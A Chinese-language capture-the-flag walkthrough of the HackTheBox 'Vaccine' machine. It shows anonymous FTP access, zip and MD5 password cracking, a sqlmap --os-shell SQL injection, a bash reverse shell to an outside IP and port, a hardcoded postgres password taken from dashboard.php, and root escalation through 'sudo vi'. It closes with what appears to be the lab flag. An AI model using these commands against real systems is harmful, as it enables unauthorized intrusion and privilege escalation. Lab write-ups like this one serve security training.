HTB-Vaccine

HTB-Vaccine

TASK 1

nmap扫一下

FTP服务托管

TASK 2

anonymous 匿名用户

TASK 3

登录上去ls一下即可看到文件

TASK 4

bin或者binary

设置文件传输类型为二进制传输类型。一般默认为ascii传输类型,但是使用ascii模式传输类似于可执行文件时,会造成传输的文件内容不对。因此建议在上传或者下载文件之前,执行 bin 命令将文件传输类型设置为二进制传输类型。

get 文件名即可

发现压缩包内含有密码

使用john进行爆破

压缩包中存在index.php,使用弱密码尝试解压压缩包,发现行不通,那就需要用到爆破工具来爆破密码了
这时候会用到john的zip2john脚本,将加密压缩包的密码hash值导出到文件中,再用john对其进行爆破

TASK 5

下载的压缩包里存在着文件,点击即可发现password

觉得像md5加密直接丢md5解密

TASK 6

–os-shell原理

使用udf提权获取webshell,也是通过into outfile向服务器写入两个文件,一个是可以直接执行系统命令,一个是进行上传文件。

–os-shell的执行条件:

dbms为mysql,网站必须是root权限

攻击者需要知道网站的绝对路径

magic_quotes_gpc = off,php主动转移功能关闭

TASK 7

sqlmap -u http://10.129.92.36/dashboard.php?search=1 —cookie=PHPSESSID=s1c9n2bp4skgni8aeb889s6tjk —os-shell

先利用sqlmap 登录进去取得cookie防止被重定向到登录界面之后反弹shell

得到shell后

先查下id

发现命令行不太对劲

进行反弹下shell

/bin/bash -c ‘bash -i >& /dev/tcp/10.10.16.20/4444 0>&1’

成功反弹shell

find / -group **postgres ** 2>/dev/null

发现大量可执行文件

使用sudo -l查看我们有哪些命令可以sudo使用

在nmap的扫描结果中知道靶机用的是apache服务,那就可以去/var/www/html目录看下,发现有个dashboard.php

$conn = pg_connect(“host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!”);

发现密码,直接ssh连接即可

ssh postgres@10.129.92.36

发现可以运行vi

TASK 8

TASK 9

由于发现我们可以sudo使用vi编辑/etc/postgresql/11/main/pg_hba.conf文件,那么就可以用sudo vi提权

进入vi界面后可能会界面重叠,直接输入:!/bin/bash再点击回车即可,输入whoami发现已经成功提权为root

在Vi编辑器中,!是用来执行shell命令的一个命令行操作符。当你在Vi编辑器中按下!后,它会让你在编辑器中执行一个外部的shell命令,并显示输出结果。例如,你提到的!/bin/bash将会执行**/bin/bash**这个shell,并进入到一个交互式的bash环境中。

dd6e058e814260bc70e9bbdef2715849

{感觉这个靶机相较于前面靶机简单好多好多}